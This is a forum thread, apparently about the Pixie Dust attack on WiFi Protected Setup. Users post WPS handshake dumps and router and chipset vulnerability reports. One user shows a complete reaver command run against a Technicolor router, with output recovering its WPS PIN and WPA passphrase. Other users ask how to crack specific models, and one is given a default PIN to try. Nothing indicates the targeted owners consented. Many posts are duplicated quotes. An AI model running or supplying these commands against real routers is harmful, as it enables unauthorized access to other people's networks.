[P] PKR: f5:a3:7d:0a:de:b7:c1:a1:ea:16:72:04:be:41:a6:7b:d6:ce:52:d1:7c:7f:42:51:f9:7d:04:6d:97:4c:97:0b:6b:18:02:fa:be:8a:3e:0c:aa:a1:82:b7:dd:3b:9b:e3:c8:60:13:b6:8f:e8:c9:8f:69:2b:49:1c:e6:53:c8:1e:af:03:4f:d7:d1:1c:a4:52:96:91:18:66:45:6c:0b:29:61:c4:8b:13:71:d5:ee:bd:53:19:63:6e:65:3d:47:5e:ed:73:75:15:39:b2:e8:13:69:fd:3c:0f:b1:e3:17:53:1a:84:93:33:81:64:01:9b:d5:99:0f:c4:a2:20:63:1e:d6:15:2b:36:f8:e0:11:ef:3a:3d:8a:b9:71:78:a1:49:a2:be:23:83:79:bd:d8:8e:8a:90:21:ce:4a:c9:08:07:b8:b7:cf:e4:0d:2c:bd:9e:38:bd:48:13:97:02:72:ef:b6:95:22:82:b5:e0:ff:ba:a4:4c:f1:93:69:90:d5:27
[P] AuthKey: 44:65:47:ff:b9:02:fe:58:58:16:54:30:15:a5:10:c1:50:1c:04:3c:d6:d2:07:a5:73:54:93:a8:0b:4b:3b:90
[P] E-Hash1: 3a:4b:c9:1c:51:f9:6a:c5:26:3c:ba:41:2d:06:c9:62:85:4a:5f:6a:16:17:a5:40:9a:6e:b6:13:1b:48:01:28
[P] E-Hash2: db:00:8d:a9:86:2f:14:12:4a:ee:23:e3:50:8b:1a:d3:c4:da:39:09:d8:55:07:7d:53:a3:3f:19:3e:ce:65:1c

Code:

[P] E-Nonce: 3c:d0:62:c2:3b:83:41:84:5a:bc:d5:92:40:b4:ac:45
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] PKR: 8b:19:f7:8c:50:67:a3:b9:ec:61:ba:b1:a6:e5:6b:94:37:89:46:b3:3c:68:62:16:57:bc:f6:00:fe:20:a6:63:82:65:f5:ac:c0:29:96:89:d0:03:8d:ed:06:b2:f7:28:00:5d:6b:fc:76:d0:f6:1c:53:a4:17:46:9b:f9:64:69:bd:a4:0e:bd:b7:32:fc:a7:7c:cc:2f:dc:2e:73:45:71:b7:46:82:4d:ec:ab:5e:d9:04:1d:a6:a0:12:63:5e:a8:da:ee:2f:15:d7:6b:9e:23:51:2b:bd:f3:a0:4d:53:55:b0:8b:a8:8f:e5:ec:cd:8b:c6:b3:7f:a0:8d:9a:4d:ea:7b:b9:5c:a2:0b:cd:f7:b7:4c:ad:c8:0c:b6:c4:21:c2:4e:91:b9:19:13:65:1c:9a:bb:0e:b5:f7:3f:92:eb:c3:4b:21:11:47:31:2a:46:06:2f:4e:9a:0d:2a:0c:37:67:17:a8:0f:06:b2:1f:19:c6:f7:25:7f:c1:c0:16:0f:48
[P] AuthKey: 0c:a1:7a:6a:da:34:42:18:96:8d:dd:8d:61:98:05:a2:ac:6f:15:4f:2c:8b:70:d3:54:2f:c2:32:06:db:52:96
[P] E-Hash1: 29:c1:bb:a1:23:c4:69:fa:0d:56:46:98:61:51:c0:8f:60:fb:fd:5f:0f:d1:d0:1a:df:56:d1:d5:12:e7:71:5d
[P] E-Hash2: 62:0b:ad:55:b2:3d:1d:b8:bf:e4:39:27:59:1d:43:47:12:3f:82:22:66:32:87:7a:a8:ec:c2:52:0b:13:f2:b6

[someone_else]

@ soxrok

please update the Chipset from Hitron CVE30360. The correct one is RT 3352F

And a new one for the Database:

NOT VULNERABLE:

TP-LINK TL-WDR3500
Atheros AR9340 / 2.4GHz
Atheros AR9300 / 5GHz

Code:

[P] E-Nonce: 1f:e5:c5:65:01:98:8c:c8:af:d5:40:33:5e:65:bc:8c
[P] PKE: 32:37:af:a7:a7:a7:f4:48:cb:31:a2:8c:c5:7b:50:68:be:a1:04:cc:28:5d:56:2c:e3:9b:c1:52:99:7e:b7:26:7b:0e:0b:d1:c2:57:22:1f:53:88:4d:79:98:8d:44:5e:3a:65:9b:e3:36:cc:3a:10:57:af:f4:f0:db:c1:02:14:0c:57:31:23:26:27:9c:c2:b3:7e:fd:8c:f1:ff:8c:a9:f9:04:2d:0a:46:09:c6:3b:97:75:04:8c:57:16:34:2e:4e:ef:01:12:e6:cc:e2:12:86:6b:a5:26:78:7b:23:73:6f:96:5f:03:8f:fb:c8:73:ab:5d:0f:dd:e4:58:91:c2:30:f5:84:a8:fe:39:eb:88:4e:e9:c0:5e:f4:3c:a2:60:8a:cc:40:8f:b1:1c:9c:bd:49:51:18:9e:93:54:70:e5:20:8d:85:0d:4f:66:fe:2f:7a:e3:c4:84:15:39:18:4d:8f:35:83:1f:e7:23:e5:4a:f7:34:7e:da:36:0f:21:8f
[P] PKR: 48:58:5f:0a:01:9a:e1:ac:8f:0c:e8:9e:c4:16:9b:c7:0c:03:02:f9:29:fb:2e:a3:6a:39:d1:87:76:e2:b5:fc:dc:44:e2:72:31:f2:75:42:af:13:33:ce:6d:a8:e0:87:2d:2f:ee:fa:27:6a:1c:0f:e7:4d:de:73:42:e8:b0:43:44:72:4b:f2:86:c9:f7:8d:47:fe:80:30:35:5a:5c:44:f7:a9:5d:41:66:79:2c:7b:2a:b8:e9:f4:a5:29:93:48:f7:57:e8:f2:fc:02:ba:6a:8b:dc:89:a5:32:f1:eb:a6:b2:64:83:c4:5a:b5:a3:96:c0:ab:25:ec:f7:2e:e2:7e:71:bd:36:c7:d0:15:89:4c:b9:e9:20:d9:23:67:c4:d4:03:5c:29:74:72:a0:c8:57:b4:8d:1e:15:c9:3e:75:84:8f:cb:c4:3a:f2:ed:fc:2e:d7:a6:31:c7:4c:01:d2:cd:ad:7a:2b:ef:4a:1c:b1:e7:44:dd:7d:77:5a:99:06:7b
[P] AuthKey: 01:ff:58:b8:ea:a8:d9:e1:a0:f0:7f:31:93:9b:d2:c8:0b:c8:98:35:72:16:4b:da:29:98:e2:bd:04:9c:37:10
[P] E-Hash1: 27:7d:37:15:b0:ca:7c:dd:45:56:0f:a9:83:26:fa:a8:85:74:9c:44:99:77:d2:a3:99:26:e0:33:8b:be:86:a3
[P] E-Hash2: 51:d0:4c:00:a2:b2:bc:01:dd:6f:d9:4c:32:76:33:3e:82:cc:72:14:e8:a0:b9:64:30:36:df:2c:95:e9:83:1f

[soxrok2212]

@ soxrok

please update the Chipset from Hitron CVE30360. The correct one is RT 3352F

And a new one for the Database:

NOT VULNERABLE:

TP-LINK TL-WDR3500
Atheros AR9340 / 2.4GHz
Atheros AR9300 / 5GHz

Code:

[P] E-Nonce: 1f:e5:c5:65:01:98:8c:c8:af:d5:40:33:5e:65:bc:8c
[P] PKE: 32:37:af:a7:a7:a7:f4:48:cb:31:a2:8c:c5:7b:50:68:be:a1:04:cc:28:5d:56:2c:e3:9b:c1:52:99:7e:b7:26:7b:0e:0b:d1:c2:57:22:1f:53:88:4d:79:98:8d:44:5e:3a:65:9b:e3:36:cc:3a:10:57:af:f4:f0:db:c1:02:14:0c:57:31:23:26:27:9c:c2:b3:7e:fd:8c:f1:ff:8c:a9:f9:04:2d:0a:46:09:c6:3b:97:75:04:8c:57:16:34:2e:4e:ef:01:12:e6:cc:e2:12:86:6b:a5:26:78:7b:23:73:6f:96:5f:03:8f:fb:c8:73:ab:5d:0f:dd:e4:58:91:c2:30:f5:84:a8:fe:39:eb:88:4e:e9:c0:5e:f4:3c:a2:60:8a:cc:40:8f:b1:1c:9c:bd:49:51:18:9e:93:54:70:e5:20:8d:85:0d:4f:66:fe:2f:7a:e3:c4:84:15:39:18:4d:8f:35:83:1f:e7:23:e5:4a:f7:34:7e:da:36:0f:21:8f
[P] PKR: 48:58:5f:0a:01:9a:e1:ac:8f:0c:e8:9e:c4:16:9b:c7:0c:03:02:f9:29:fb:2e:a3:6a:39:d1:87:76:e2:b5:fc:dc:44:e2:72:31:f2:75:42:af:13:33:ce:6d:a8:e0:87:2d:2f:ee:fa:27:6a:1c:0f:e7:4d:de:73:42:e8:b0:43:44:72:4b:f2:86:c9:f7:8d:47:fe:80:30:35:5a:5c:44:f7:a9:5d:41:66:79:2c:7b:2a:b8:e9:f4:a5:29:93:48:f7:57:e8:f2:fc:02:ba:6a:8b:dc:89:a5:32:f1:eb:a6:b2:64:83:c4:5a:b5:a3:96:c0:ab:25:ec:f7:2e:e2:7e:71:bd:36:c7:d0:15:89:4c:b9:e9:20:d9:23:67:c4:d4:03:5c:29:74:72:a0:c8:57:b4:8d:1e:15:c9:3e:75:84:8f:cb:c4:3a:f2:ed:fc:2e:d7:a6:31:c7:4c:01:d2:cd:ad:7a:2b:ef:4a:1c:b1:e7:44:dd:7d:77:5a:99:06:7b
[P] AuthKey: 01:ff:58:b8:ea:a8:d9:e1:a0:f0:7f:31:93:9b:d2:c8:0b:c8:98:35:72:16:4b:da:29:98:e2:bd:04:9c:37:10
[P] E-Hash1: 27:7d:37:15:b0:ca:7c:dd:45:56:0f:a9:83:26:fa:a8:85:74:9c:44:99:77:d2:a3:99:26:e0:33:8b:be:86:a3
[P] E-Hash2: 51:d0:4c:00:a2:b2:bc:01:dd:6f:d9:4c:32:76:33:3e:82:cc:72:14:e8:a0:b9:64:30:36:df:2c:95:e9:83:1f

Whoops... thanks!

[aboulatif]

hi soxrok2212 what about technicolor TD5130? is there any method to crack it

[iliass]

your news version it works in TD5130 v 2 ..but TD5130 V 1 no a will wait a new video for all chipset realtekk

[lovemyth]

I am not success with this AP, Do you need me gather more any infomation ?

[DeEqualsDos]

Doesnt work in uk talktalk super router
broadcam chipset huawei model

[unsuns06]

I confirm it's working on Technicolor TD5130 v2... :

Code:

wifislax ~ # reaver -i mon0 -b A6:25:89:XX:XX:XX -c 1 -K 3 -P

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

[+] Waiting for beacon from A6:25:89:XX:XX:XX
[+] Associated with A6:25:89:XX:XX:XX (ESSID: TNCAPxxxxxx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[P] E-Nonce: 57:51:75:d2:5f:d2:e1:0e:0b:20:d4:c4:0b:40:34:1a
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Number: EV-2010-09-20
[P] Access Point Serial Number: 123456789012347
[P] PKR: 44:7c:98:9e:94:47:e5:bc:22:0e:4f:b9:19:86:18:3a:35:e9:70:8c:6d:97:a3:81:53:08:1b:22:4c:4a:fd:0a:2a:a0:b9:37:de:31:86:2f:63:a1:2c:75:35:10:d9:2b:e3:8f:b7:6b:57:c9:58:fd:e8:0e:bf:87:44:08:23:84:ca:85:ec:2d:53:f3:27:cd:d5:a5:e7:93:9f:3a:7a:66:d3:c4:f1:eb:d4:e9:6c:60:ce:63:12:bc:ac:04:1e:ca:fd:ab:cf:b0:a4:d3:ad:39:f5:bd:1e:b2:c1:93:34:9d:b7:8b:cc:98:c9:3e:90:d6:08:c0:08:18:51:d3:ff:5f:6a:a5:32:a5:d3:5f:7d:48:bb:4f:f1:bc:eb:ac:95:22:8f:da:e3:a2:46:b9:52:3c:ff:95:db:95:a9:0c:28:30:f8:68:97:9a:a7:66:02:9c:11:da:ab:3d:7d:b7:30:ab:a8:69:c5:07:f5:da:da:e3:3b:36:7e:f0:97:80:7b:27
[P] AuthKey: 04:b8:0b:ef:4b:f1:12:76:23:39:2d:f6:32:bb:c3:57:15:45:17:c9:46:e3:a0:3b:44:80:2e:83:16:d8:1e:22
[P] E-Hash1: e6:0e:1b:5f:e2:f1:bc:eb:1e:f7:c4:1d:69:97:3a:ea:3b:81:25:aa:64:4a:23:11:cb:cd:52:8e:c3:78:39:9a
[P] E-Hash2: b9:f4:db:b2:08:1b:31:43:6e:70:9f:ca:cb:4d:bb:5d:0a:fc:86:5b:a4:76:33:e6:e0:cd:1b:b9:05:2f:d1:ce
[Pixie-Dust]  
[Pixie-Dust][*] ES-1: 57:51:75:d2:5f:d2:e1:0e:0b:20:d4:c4:0b:40:34:1a
[Pixie-Dust][*] ES-2: 57:51:75:d2:5f:d2:e1:0e:0b:20:d4:c4:0b:40:34:1a
[Pixie-Dust][*] PSK1: 49:40:f7:f2:af:67:5a:50:81:12:b6:27:82:2f:35:3b
[Pixie-Dust][*] PSK2: d7:c0:5c:8d:60:9a:a6:cc:c0:fe:9e:6c:36:77:04:84
[Pixie-Dust]   [+] WPS pin: 99280710
[Pixie-Dust]  
[Pixie-Dust][*] Time taken: 0 s
[Pixie-Dust]  
Running reaver with the correct pin, wait ...
Cmd : reaver -i mon0 -b A6:25:89:XX:XX:XX -c 1 -s y -p 99280710

[Reaver Test] BSSID: A6:25:89:XX:XX:XX
[Reaver Test] Channel: 1
[Reaver Test] [+] WPS PIN: '99280710'
[Reaver Test] [+] WPA PSK: '18D189E728'
[Reaver Test] [+] AP SSID: 'TNCAPxxxxxx'

..But not on TD5130 v1 :

Code:

wifislax ~ # reaver -i mon0 -b 00:18:E7:XX:XX:XX -c 1 -K 3 -P

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

[+] Waiting for beacon from 00:18:E7:XX:XX:XX
[+] Associated with 00:18:E7:XX:XX:XX (ESSID: TNCAPxxxxxx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[P] E-Nonce: 55:b3:65:81:7c:d3:2a:9b:72:bf:d2:23:58:93:d9:88
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Technicolor
[P] WPS Model Number: Technicolor TD5
[P] Access Point Serial Number: 1209A1D12783
[P] PKR: 2f:97:c1:c5:de:cd:d7:b5:15:ef:8d:bb:e1:53:7c:9f:5c:3d:d2:48:63:a2:d2:ec:1b:88:69:27:44:d2:be:4f:b6:a6:b8:07:5b:10:8c:a1:a7:01:ea:b7:f0:71:a9:90:31:78:f4:16:8f:4b:6b:0a:89:48:70:18:ad:93:f7:a7:4f:46:37:ee:50:cb:64:5f:c6:ec:a4:10:5f:ef:a5:90:0c:3b:e3:b3:50:e9:2a:6b:ea:ce:b4:c4:7f:51:be:ae:59:45:a8:17:a3:8e:9f:6a:05:9e:6f:8b:76:c4:30:9f:bc:c1:b6:76:2b:6d:dd:4e:3b:26:6c:c9:f5:eb:c6:49:eb:9d:a3:ae:64:5a:f5:87:88:46:ff:30:3e:87:1a:e0:12:89:81:7f:6e:f3:a2:8b:f5:66:47:66:ab:71:0b:1f:4d:de:9f:d9:d7:c4:cc:c5:73:65:93:75:dd:89:ec:43:b0:2e:7e:51:46:1f:79:ee:70:4b:de:26:8a:21:6c:99
[P] AuthKey: f1:63:8a:98:70:5b:6b:9b:fc:e5:f7:69:c9:a8:fd:01:9c:b8:81:e9:c7:07:44:60:98:f1:c1:70:62:d0:65:f4
[P] E-Nonce: 5f:a2:06:2d:1c:01:6b:cc:67:7e:f6:e7:53:df:38:01
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Technicolor
[P] WPS Model Number: Technicolor TD5
[P] Access Point Serial Number: 1209A1D12783
[P] PKR: 1e:4c:22:6d:a7:ce:f8:b7:d0:16:83:76:33:6b:8f:4f:b1:9e:6c:8a:a6:7d:6a:4a:14:8e:4e:5b:2e:fa:e5:4e:a1:b2:d0:a0:65:75:16:a6:10:60:27:8d:31:74:4b:e1:4e:0e:18:2d:f2:ae:10:3f:2f:14:ff:51:75:24:8b:d3:6a:a4:23:72:7d:d8:bb:63:6b:89:c9:22:0f:32:e3:1b:bb:2b:b6:3c:8a:b3:4f:c7:a1:4b:fc:d2:4c:73:9c:1d:3f:ae:6d:aa:3f:f0:a0:84:51:e2:1f:ca:91:f5:89:44:47:48:3c:23:6e:e0:b5:22:f3:c7:9c:db:3f:91:82:78:9f:73:4a:dd:38:00:f4:ee:a9:4f:ce:4a:4c:e8:3f:87:9f:e6:3a:a9:07:90:31:05:09:a7:7d:3f:e6:03:70:44:61:f8:20:cc:47:c3:15:dd:50:52:54:ee:99:c4:85:7e:8a:64:8f:0f:60:16:3a:ed:3c:8d:d9:17:3e:ca:22:62
[P] AuthKey: f7:94:e0:53:05:c6:92:37:13:8c:d8:04:54:3a:42:5e:5f:8f:4f:28:ae:7a:51:9e:91:3e:69:e8:f6:c8:68:43
[P] E-Hash1: 51:6d:e5:bc:37:d0:ae:bb:de:b8:6d:91:40:b4:55:1a:c0:15:a1:32:29:1a:c3:66:9f:3e:6f:38:39:3c:ee:95
[P] E-Hash2: c5:e2:df:28:ed:50:8d:69:31:e9:85:9e:1b:68:12:18:cf:c7:1f:f7:f8:41:f4:01:b3:5a:8e:83:a3:24:9e:96
[Pixie-Dust]  
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]  
[Pixie-Dust][*] Time taken: 1 s

So we're waiting for a new update of Pixie, and I hope it'll be very soon...

[soxrok2212]

I confirm it's working on Technicolor TD5130 v2... :

..But not on TD5130 v1 :

Code:

wifislax ~ # reaver -i mon0 -b 00:18:E7:XX:XX:XX -c 1 -K 3 -P

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

[+] Waiting for beacon from 00:18:E7:XX:XX:XX
[+] Associated with 00:18:E7:XX:XX:XX (ESSID: TNCAPxxxxxx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[P] E-Nonce: 55:b3:65:81:7c:d3:2a:9b:72:bf:d2:23:58:93:d9:88
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Technicolor
[P] WPS Model Number: Technicolor TD5
[P] Access Point Serial Number: 1209A1D12783
[P] PKR: 2f:97:c1:c5:de:cd:d7:b5:15:ef:8d:bb:e1:53:7c:9f:5c:3d:d2:48:63:a2:d2:ec:1b:88:69:27:44:d2:be:4f:b6:a6:b8:07:5b:10:8c:a1:a7:01:ea:b7:f0:71:a9:90:31:78:f4:16:8f:4b:6b:0a:89:48:70:18:ad:93:f7:a7:4f:46:37:ee:50:cb:64:5f:c6:ec:a4:10:5f:ef:a5:90:0c:3b:e3:b3:50:e9:2a:6b:ea:ce:b4:c4:7f:51:be:ae:59:45:a8:17:a3:8e:9f:6a:05:9e:6f:8b:76:c4:30:9f:bc:c1:b6:76:2b:6d:dd:4e:3b:26:6c:c9:f5:eb:c6:49:eb:9d:a3:ae:64:5a:f5:87:88:46:ff:30:3e:87:1a:e0:12:89:81:7f:6e:f3:a2:8b:f5:66:47:66:ab:71:0b:1f:4d:de:9f:d9:d7:c4:cc:c5:73:65:93:75:dd:89:ec:43:b0:2e:7e:51:46:1f:79:ee:70:4b:de:26:8a:21:6c:99
[P] AuthKey: f1:63:8a:98:70:5b:6b:9b:fc:e5:f7:69:c9:a8:fd:01:9c:b8:81:e9:c7:07:44:60:98:f1:c1:70:62:d0:65:f4
[P] E-Nonce: 5f:a2:06:2d:1c:01:6b:cc:67:7e:f6:e7:53:df:38:01
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Technicolor
[P] WPS Model Number: Technicolor TD5
[P] Access Point Serial Number: 1209A1D12783
[P] PKR: 1e:4c:22:6d:a7:ce:f8:b7:d0:16:83:76:33:6b:8f:4f:b1:9e:6c:8a:a6:7d:6a:4a:14:8e:4e:5b:2e:fa:e5:4e:a1:b2:d0:a0:65:75:16:a6:10:60:27:8d:31:74:4b:e1:4e:0e:18:2d:f2:ae:10:3f:2f:14:ff:51:75:24:8b:d3:6a:a4:23:72:7d:d8:bb:63:6b:89:c9:22:0f:32:e3:1b:bb:2b:b6:3c:8a:b3:4f:c7:a1:4b:fc:d2:4c:73:9c:1d:3f:ae:6d:aa:3f:f0:a0:84:51:e2:1f:ca:91:f5:89:44:47:48:3c:23:6e:e0:b5:22:f3:c7:9c:db:3f:91:82:78:9f:73:4a:dd:38:00:f4:ee:a9:4f:ce:4a:4c:e8:3f:87:9f:e6:3a:a9:07:90:31:05:09:a7:7d:3f:e6:03:70:44:61:f8:20:cc:47:c3:15:dd:50:52:54:ee:99:c4:85:7e:8a:64:8f:0f:60:16:3a:ed:3c:8d:d9:17:3e:ca:22:62
[P] AuthKey: f7:94:e0:53:05:c6:92:37:13:8c:d8:04:54:3a:42:5e:5f:8f:4f:28:ae:7a:51:9e:91:3e:69:e8:f6:c8:68:43
[P] E-Hash1: 51:6d:e5:bc:37:d0:ae:bb:de:b8:6d:91:40:b4:55:1a:c0:15:a1:32:29:1a:c3:66:9f:3e:6f:38:39:3c:ee:95
[P] E-Hash2: c5:e2:df:28:ed:50:8d:69:31:e9:85:9e:1b:68:12:18:cf:c7:1f:f7:f8:41:f4:01:b3:5a:8e:83:a3:24:9e:96
[Pixie-Dust]  
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]  
[Pixie-Dust][*] Time taken: 1 s

So we're waiting for a new update of Pixie, and I hope it'll be very soon...

Try this PIN: 76757891

[unsuns06]

How did you get this PIN ?

I will try it later this week because I'm travelling right now.

Thank you.

[unsuns06]

Try this PIN: 76757891

IT'S THE 3RD TIME I TRY TO POST A REPLY, I hope this ONE WILL BE PUBLISHED.

How did you get this PIN ?

I'll try it later this week, because I'm travelling right now.

When will the new update of pixie be released ?

Many thanks.

[Frost.Elrick]

pixiewps inst installing.
it shows problem in line 46:26
after that it also halts on 'SHA1' line.
any way to solve it...???
im running kali in live

[soxrok2212]

Alright thanks... there was no other pin listed?

[someone_else]

Alright thanks... there was no other pin listed?

nope. Don't know, if this is ISP/Country specific, but (again) all testet Routers have the same PIN.

Here is the User-Manual, the WPS Menu is described on page 50.

[Saydamination]

.

Now , I have an information about F8:1A:67:XX:XX:XX mac adress (RTL 8671 ev 2006 07 27 chipset of TPLINK modems)

This mac adresses are mask ...F8:1A:67 is mask , FA:1A:67 orjinal mac..

[wn722]

if it's any use for anyone

TP-LINK TL-WR841ND v8.x
WI1 chip1: Atheros AR9341

Code:

[P] E-Nonce: b0:74:6b:86:dd:ed:47:b7:63:2b:4c:12:12:d5:c1:4e
[P] PKE: cb:8b:ce:5a:3e:49:e1:f6:02:75:c2:cb:c4:cd:bb:48:1e:a0:e8:ea:95:85:c3:62:6c:c1:ec:e3:58:01:54:8b:55:f2:34:59:34:4a:3d:22:26:44:76:42:60:b8:a2:41:40:38:db:17:b1:0d:92:81:f5:c2:31:b4:d9:b1:50:41:70:5b:ce:58:34:3c:83:7a:99:26:66:da:be:6b:ab:87:45:ea:2a:b3:11:9a:b0:de:73:df:9f:65:24:3d:75:cd:f7:63:8a:d7:9f:21:ae:60:63:fd:1c:0a:62:e1:6c:63:cc:4a:63:1a:aa:e3:28:c5:88:d7:7e:49:53:1b:be:7a:2c:d7:2c:1b:bf:72:74:29:3e:5a:77:e7:ad:55:bd:84:6b:dd:0a:56:81:ce:e4:10:d0:ab:16:9a:2a:f8:bc:92:52:30:4f:f1:74:9e:48:fd:2e:ea:01:de:f9:96:3d:75:67:c5:74:53:c2:37:06:13:8e:5f:c5:59:15:28:15:dc
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 8.0
[P] WPS Model Serial Number: 1.0
[+] Received M1 message
